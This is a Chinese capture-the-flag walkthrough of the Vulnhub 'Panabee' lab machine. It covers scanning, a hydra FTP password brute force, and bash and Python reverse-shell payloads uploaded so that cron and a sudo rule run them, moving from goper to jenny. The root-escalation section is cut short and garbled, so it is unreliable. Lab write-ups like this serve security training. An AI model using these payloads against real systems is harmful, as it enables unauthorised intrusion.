Vulnhub之Panabee靶机详细测试过程

Panabee

识别目标主机IP地址

1. (kali㉿kali)-[~/Desktop/Vulnhub/Panabee]
2. └─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
3. Currently scanning: 192.168.56.0/24   |   Screen View: Unique Hosts                                                        
4.                                                                                                                            
5. 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180                                                            
6. _____________________________________________________________________________
7.    IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
8. -----------------------------------------------------------------------------
9. 192.168.56.1    0a:00:27:00:00:11      1      60  Unknown vendor                                                           
10. 192.168.56.100  08:00:27:cd:98:c4      1      60  PCS Systemtechnik GmbH                                                   
11. 192.168.56.228  08:00:27:2b:99:a3      1      60  PCS Systemtechnik GmbH                                                   

复制代码

利用Kali Linux的netdiscover工具识别目标主机IP地址为192.168.56.228
NMAP扫描

1. ┌──(kali㉿kali)-[~/Desktop/Vulnhub/Panabee]
2. └─$ sudo nmap -sS -sV -sC -p- 192.168.56.228 -oN nmap_full_scan
3. Starting Nmap 7.92 ( https://nmap.org ) at 2023-03-22 23:21 EDT
4. Nmap scan report for bogon (192.168.56.228)
5. Host is up (0.00011s latency).
6. Not shown: 65529 closed tcp ports (reset)
7. PORT    STATE SERVICE     VERSION
8. 21/tcp  open  ftp         vsftpd 3.0.3
9. 22/tcp  open  ssh         OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
10. | ssh-hostkey:
11. |   3072 dc:e1:e6:86:ba:cd:4c:1c:e8:92:c4:02:90:64:d8:ba (RSA)
12. |   256 00:72:c6:61:0e:34:1b:1a:b4:6c:f8:fc:b3:25:7b:6c (ECDSA)
13. |_  256 16:24:5b:97:20:ad:7d:ec:c4:fc:19:a5:3d:3c:cc:13 (ED25519)
14. 25/tcp  open  smtp        Postfix smtpd
15. | ssl-cert: Subject: commonName=panabee
16. | Subject Alternative Name: DNS:panabee
17. | Not valid before: 2020-06-14T18:25:48
18. |_Not valid after:  2030-06-12T18:25:48
19. |_ssl-date: TLS randomness does not represent time
20. |_smtp-commands: panabee, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8, CHUNKING
21. 80/tcp  open  http        Apache httpd 2.4.41 ((Ubuntu))
22. |_http-server-header: Apache/2.4.41 (Ubuntu)
23. |_http-title: Apache2 Ubuntu Default Page: It works
24. 139/tcp open  netbios-ssn Samba smbd 4.6.2
25. 445/tcp open  netbios-ssn Samba smbd 4.6.2
26. MAC Address: 08:00:27:2B:99:A3 (Oracle VirtualBox virtual NIC)
27. Service Info: Host:  panabee; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
29. Host script results:
30. |_clock-skew: 7h59m58s
31. |_nbstat: NetBIOS name: PANABEE, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
32. | smb2-time:
33. |   date: 2023-03-23T11:21:52
34. |_  start_date: N/A
35. | smb2-security-mode:
36. |   3.1.1:
37. |_    Message signing enabled but not required
39. Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
40. Nmap done: 1 IP address (1 host up) scanned in 18.16 seconds
41.                                                                  

复制代码

获得Shell

1. ┌──(kali㉿kali)-[~/Desktop/Vulnhub/Panabee]
2. └─$ smbclient //192.168.56.228/note      
3. Password for [WORKGROUP\kali]:
4. Try "help" to get a list of possible commands.
5. smb: \> ls
6.   .                                   D        0  Sun Jun 14 23:08:42 2020
7.   ..                                  D        0  Mon Jun 15 04:59:44 2020
8.   note.txt                            N      265  Sun Jun 14 23:08:42 2020
10.                 20508240 blocks of size 1024. 12823536 blocks available
11. smb: \> get note.txt
12. getting file \note.txt of size 265 as note.txt (2.3 KiloBytes/sec) (average 2.3 KiloBytes/sec)
13. smb: \> put test.txt
14. putting file test.txt as \test.txt (2.3 kb/s) (average 2.3 kb/s)
15. smb: \> ls -alh
16. NT_STATUS_NO_SUCH_FILE listing \-alh
17. smb: \> ls
18.   .                                   D        0  Thu Mar 23 07:23:20 2023
19.   ..                                  D        0  Mon Jun 15 04:59:44 2020
20.   test.txt                            A       12  Thu Mar 23 07:23:20 2023
21.   note.txt                            N      265  Sun Jun 14 23:08:42 2020
23.                 20508240 blocks of size 1024. 12823528 blocks available

复制代码

可以通过SMB上传文件

1. ┌──(kali㉿kali)-[~/Desktop/Vulnhub/Panabee]
2. └─$ cat note.txt      
3. Dear goper,
5. I'll just leave it here as a note,
7. Sorry for the late response,
8. The server will now `backup` you files in your home dir,
9. go ahead and backup anything you like, server will do it for you.
11. Please delete this note once you've read for security measure

复制代码

• goper是用户名？
  
• 有计划任务在执行？（定期备份文件）
  

1. ┌──(kali㉿kali)-[~/Desktop/Vulnhub/Panabee]
2. └─$ nikto -h http://192.168.56.228
3. - Nikto v2.1.6
4. ---------------------------------------------------------------------------
5. + Target IP:          192.168.56.228
6. + Target Hostname:    192.168.56.228
7. + Target Port:        80
8. + Start Time:         2023-03-22 23:25:23 (GMT-4)
9. ---------------------------------------------------------------------------
10. + Server: Apache/2.4.41 (Ubuntu)
11. + The anti-clickjacking X-Frame-Options header is not present.
12. + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
13. + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
14. + No CGI Directories found (use '-C all' to force check all possible dirs)
15. + Server may leak inodes via ETags, header found with file /, inode: 2aa6, size: 5a81bc478475f, mtime: gzip
16. + Allowed HTTP Methods: HEAD, GET, POST, OPTIONS
17. + 7915 requests: 0 error(s) and 5 item(s) reported on remote host
18. + End Time:           2023-03-22 23:25:52 (GMT-4) (29 seconds)
19. ---------------------------------------------------------------------------
20. + 1 host(s) tested
23.       *********************************************************************
24.       Portions of the server's headers (Apache/2.4.41) are not in
25.       the Nikto 2.1.6 database or are newer than the known string. Would you like
26.       to submit this information (*no server specific data*) to CIRT.net
27.       for a Nikto update (or you may email to sullo@cirt.net) (y/n)?

复制代码

目录扫描没有什么收获，接下来用hydra来破解密码

1. ──(kali㉿kali)-[~/Desktop/Vulnhub/Panabee]
2. └─$ hydra -l goper -P /usr/share/wordlists/rockyou.txt ftp://192.168.56.228         
3. Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
5. Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-03-22 23:38:08
6. [DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
7. [DATA] attacking ftp://192.168.56.228:21/
8. [21][ftp] host: 192.168.56.228   login: goper   password: spiderman
9. 1 of 1 target successfully completed, 1 valid password found
10. Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-03-22 23:39:08

复制代码

1. ┌──(kali㉿kali)-[~/Desktop/Vulnhub/Panabee]
2. └─$ ftp 192.168.56.228        
3. Connected to 192.168.56.228.
4. 220 (vsFTPd 3.0.3)
5. Name (192.168.56.228:kali): goper
6. 331 Please specify the password.
7. Password:
8. 230 Login successful.
9. Remote system type is UNIX.
10. Using binary mode to transfer files.
11. ftp> ls -alh
12. 229 Entering Extended Passive Mode (|||8003|)
13. 150 Here comes the directory listing.
14. drwxrwxr-x    4 1000     118          4096 Jun 21  2020 .
15. drwxrwxr-x    4 1000     118          4096 Jun 21  2020 ..
16. -rw-------    1 1000     1000         4591 Jun 21  2020 .bash_history
17. -rw-r--r--    1 1000     1000          220 Feb 25  2020 .bash_logout
18. -rw-r--r--    1 1000     1000         3771 Feb 25  2020 .bashrc
19. drwx------    2 1000     1000         4096 Jun 14  2020 .cache
20. drwxrwxr-x    3 1000     1000         4096 Jun 15  2020 .local
21. -rw-r--r--    1 1000     1000          807 Feb 25  2020 .profile
22. -rw-rw-r--    1 1000     1000           66 Jun 15  2020 .selected_editor
23. -rw-r--r--    1 1000     1000            0 Jun 14  2020 .sudo_as_admin_successful
24. -rw-------    1 1000     1000        11134 Jun 15  2020 .viminfo
25. -rw-r--r--    1 0        1000          332 Jun 15  2020 status.py
26. 226 Directory send OK.
27. ftp> pwd
28. Remote directory: /
29. ftp> get status.py
30. local: status.py remote: status.py
31. 229 Entering Extended Passive Mode (|||59411|)
32. 150 Opening BINARY mode data connection for status.py (332 bytes).
33. 100% |*********************************************************************************|   332        2.25 KiB/s    00:00 ETA
34. 226 Transfer complete.
35. 332 bytes received in 00:00 (2.23 KiB/s)
36. ftp> put test.txt
37. local: test.txt remote: test.txt
38. 229 Entering Extended Passive Mode (|||13323|)
39. 150 Ok to send data.
40. 100% |*********************************************************************************|    12      221.10 KiB/s    00:00 ETA
41. 226 Transfer complete.
42. 12 bytes sent in 00:00 (8.87 KiB/s)
43. ftp>

复制代码

似乎在goper的家目录，因此可以将ssh公钥上传到目标主机

1. ──(kali㉿kali)-[~/Desktop/Vulnhub/Panabee]
2. └─$ ssh-keygen              
3. Generating public/private rsa key pair.
4. Enter file in which to save the key (/home/kali/.ssh/id_rsa): goper
5. Enter passphrase (empty for no passphrase):
6. Enter same passphrase again:
7. Your identification has been saved in goper
8. Your public key has been saved in goper.pub
9. The key fingerprint is:
10. SHA256:3+QFgFMWB+8pvT4RzyAYwi8m6G0MyrXVJolWXxFpj4c kali@kali
11. The key's randomart image is:
12. +---[RSA 3072]----+
13. |     .   =Xo.    |
14. |     .o += +     |
15. |   .o +oo++ o    |
16. |  o+.+o+oE.=oo   |
17. |.oo+ooo.S o.==.  |
18. |....+    . =.oo  |
19. |   .      . +.   |
20. |           ..    |
21. |            ..   |
22. +----[SHA256]-----+
23.                                                                                                                               
24. ┌──(kali㉿kali)-[~/Desktop/Vulnhub/Panabee]
25. └─$ ls     
26. goper  goper.pub  nmap_full_scan  note.txt  status.py  test.txt

复制代码

1. ftp> mkdir .ssh
2. 257 "/.ssh" created
3. ftp> cd .ssh
4. 250 Directory successfully changed.
5. ftp> put authorized_keys
6. local: authorized_keys remote: authorized_keys
7. 229 Entering Extended Passive Mode (|||34675|)
8. 150 Ok to send data.
9. 100% |*********************************************************************************|   563       16.77 MiB/s    00:00 ETA
10. 226 Transfer complete.
11. 563 bytes sent in 00:00 (0.98 MiB/s)
12. ftp>

复制代码

1. ┌──(kali㉿kali)-[~/Desktop/Vulnhub/Panabee]
2. └─$ ssh -i goper goper@192.168.56.228         
3. The authenticity of host '192.168.56.228 (192.168.56.228)' can't be established.
4. ED25519 key fingerprint is SHA256:pA08zKKK15biAZhw/s1p7SqYmXtikdcPqTiWNiYSLwk.
5. This key is not known by any other names
6. Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
7. Warning: Permanently added '192.168.56.228' (ED25519) to the list of known hosts.
8. goper@192.168.56.228: Permission denied (publickey).
9.                                                                            

复制代码

但是目标并不允许基于私钥登录，这条路行不通
写一个bash脚本上传到ftp也就是goper的家目录，看能不能被自动执行

1. ┌──(kali㉿kali)-[~/Desktop/Vulnhub/Panabee]
2. └─$ cat shell.sh
3. bash -i >& /dev/tcp/192.168.56.146/5555 0>&1

复制代码

这个bash脚本名称应该是backup.sh，才回cron执行

1. ftp> put backup.sh
2. local: backup.sh remote: backup.sh
3. 229 Entering Extended Passive Mode (|||10215|)
4. 150 Ok to send data.
5. 100% |*********************************************************************************|    57      869.75 KiB/s    00:00 ETA
6. 226 Transfer complete.
7. 57 bytes sent in 00:00 (45.43 KiB/s)

复制代码

1. ─$ sudo nc -nlvp 5555
2. listening on [any] 5555 ...
3. connect to [192.168.56.146] from (UNKNOWN) [192.168.56.228] 45726
4. bash: cannot set terminal process group (3520): Inappropriate ioctl for device
5. bash: no job control in this shell
6. goper@panabee:~$ pwd
7. pwd
8. /home/goper
9. goper@panabee:~$ ls -alh
10. ls -alh
11. total 72K
12. drwxrwxr-x 5 goper ftp   4.0K Mar 23 11:57 .
13. drwxr-xr-x 4 root  root  4.0K Jun 15  2020 ..
14. -rwx--x--x 1 goper goper   57 Mar 23 11:57 backup.sh
15. -rw------- 1 goper goper 4.5K Jun 21  2020 .bash_history
16. -rw-r--r-- 1 goper goper  220 Feb 25  2020 .bash_logout
17. -rw-r--r-- 1 goper goper 3.7K Feb 25  2020 .bashrc
18. drwx------ 2 goper goper 4.0K Jun 14  2020 .cache
19. drwxrwxr-x 3 goper goper 4.0K Jun 15  2020 .local
20. -rw-r--r-- 1 goper goper  807 Feb 25  2020 .profile
21. -rw-rw-r-- 1 goper goper   66 Jun 15  2020 .selected_editor
22. -rw------- 1 goper goper   57 Mar 23 11:54 shell.sh
23. drwx------ 2 goper goper 4.0K Mar 23 11:43 .ssh
24. -rw-r--r-- 1 root  goper  332 Jun 15  2020 status.py
25. -rw-r--r-- 1 goper goper    0 Jun 14  2020 .sudo_as_admin_successful
26. -rw------- 1 goper goper   12 Mar 23 11:40 test.txt
27. -rw------- 1 goper goper  11K Jun 15  2020 .viminfo
28. goper@panabee:~$ sudo -l
29. sudo -l
30. Matching Defaults entries for goper on panabee:
31.     env_reset, mail_badpass,
32.     secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
34. User goper may run the following commands on panabee:
35.     (jenny) NOPASSWD: /usr/bin/python3 /home/goper/status.py

复制代码

可以将原有的status.py删除，然后通过FTP上传反弹shell的python脚本，从而得到jenny的shell

1. ┌──(kali㉿kali)-[~/Desktop/Vulnhub/Panabee]
2. └─$ vim status.py        
3.                                                                                                                               
4. ┌──(kali㉿kali)-[~/Desktop/Vulnhub/Panabee]
5. └─$ cat status.py
6. python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.56.146",8888));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

复制代码

1. goper@panabee:~$ rm -rf status.py
2. rm -rf status.py

复制代码

1. ftp> put status.py
2. local: status.py remote: status.py
3. 229 Entering Extended Passive Mode (|||26655|)
4. 150 Ok to send data.
5. 100% |*********************************************************************************|   232        3.35 MiB/s    00:00 ETA
6. 226 Transfer complete.
7. 232 bytes sent in 00:00 (167.32 KiB/s)
8. ftp>

复制代码

1. ┌──(kali㉿kali)-[~/Desktop/Vulnhub/Panabee]
2. └─$ cat status.py
3. import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.56.146",8888));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);
4.                                                                                                 

复制代码

1. goper@panabee:~$ sudo -u jenny /usr/bin/python3 /home/goper/status.py
2. sudo -u jenny /usr/bin/python3 /home/goper/status.py
3. /usr/bin/python3: can't open file '/home/goper/status.py': [Errno 13] Permission denied
4. goper@panabee:~$ chmod 777 status.py
5. chmod 777 status.py
6. goper@panabee:~$ sudo -u jenny /usr/bin/python3 /home/goper/status.py
7. sudo -u jenny /usr/bin/python3 /home/goper/status.py

复制代码

1. ┌──(kali㉿kali)-[~/Desktop/Vulnhub/Panabee]
2. └─$ sudo nc -nlvp 8888
3. listening on [any] 8888 ...
4. connect to [192.168.56.146] from (UNKNOWN) [192.168.56.228] 59108
5. $ id
6. uid=1001(jenny) gid=1001(jenny) groups=1001(jenny)
7. $ which python3
8. /usr/bin/python3
9. $ python3 -c 'import pty;pty.spawn("/bin/bash")'
10. jenny@panabee:/home/goper$ cd /home
11. cd /home
12. jenny@panabee:/home$ ls -alh
13. ls -alh
14. total 16K
15. drwxr-xr-x  4 root  root  4.0K Jun 15  2020 .
16. drwxr-xr-x 20 root  root  4.0K Jun 15  2020 ..
17. drwxrwxr-x  5 goper ftp   4.0K Mar 23 12:08 goper
18. drwx------  3 jenny jenny 4.0K Jun 15  2020 jenny
19. jenny@panabee:/home$ cd jenny
20. cd jenny
21. jenny@panabee:~$ ls -alh
22. ls -alh
23. total 40K
24. drwx------ 3 jenny jenny 4.0K Jun 15  2020 .
25. drwxr-xr-x 4 root  root  4.0K Jun 15  2020 ..
26. -rw------- 1 jenny jenny 2.0K Jun 30  2020 .bash_history
27. -rw-r--r-- 1 jenny jenny  220 Feb 25  2020 .bash_logout
28. -rw-r--r-- 1 jenny jenny 3.7K Feb 25  2020 .bashrc
29. -rw------- 1 jenny jenny   32 Jun 15  2020 .lesshst
30. -rw-r--r-- 1 jenny jenny  807 Feb 25  2020 .profile
31. -rw-rw-r-- 1 jenny jenny   13 Jun 15  2020 status.txt
32. -rw-r--r-- 1 root  root   213 Jun 15  2020 thanks_jenny
33. drwxrwxr-x 2 root  jenny 4.0K Jun 30  2020 .tmux-0

复制代码

从.bash_history知道有个secret.zip文件，将其下载到Kali Linux本地
但是破解失败，本靶机的提权需要利用.tmux进行

1. [/code][size=5]提权[/size]
3. [code]cd /root
4. # ls -alh
5. ls -alh
6. total 80K
7. drwx------  5 root root 4.0K Jun 30  2020 .
8. drwxr-xr-x 20 root root 4.0K Jun 15  2020 ..
9. -rw-------  1 root root  18K Jun 30  2020 .bash_history
10. -rw-r--r--  1 root root 3.1K Dec  5  2019 .bashrc
11. drwx------  2 root root 4.0K Jun 14  2020 .cache
12. -rw-------  1 root root   38 Jun 30  2020 .lesshst
13. drwxr-xr-x  3 root root 4.0K Jun 14  2020 .local
14. -rw-r--r--  1 root root  161 Dec  5  2019 .profile
15. -rw-r--r--  1 root root  239 Jun 15  2020 proof.txt
16. -rw-r--r--  1 root root   66 Jun 15  2020 .selected_editor
17. drwx------  2 root root 4.0K Jun 14  2020 .ssh
18. -rw-------  1 root root  13K Jun 21  2020 .viminfo
19. __                  __   ___  ___   
20. |__)  /\  |\ |  /\  |__) |__  |__     
21. |    /~~\ | \| /~~\ |__) |___ |___   
22.                                       

复制代码

免责声明：如果侵犯了您的权益，请联系站长，我们会及时删除侵权内容，谢谢合作！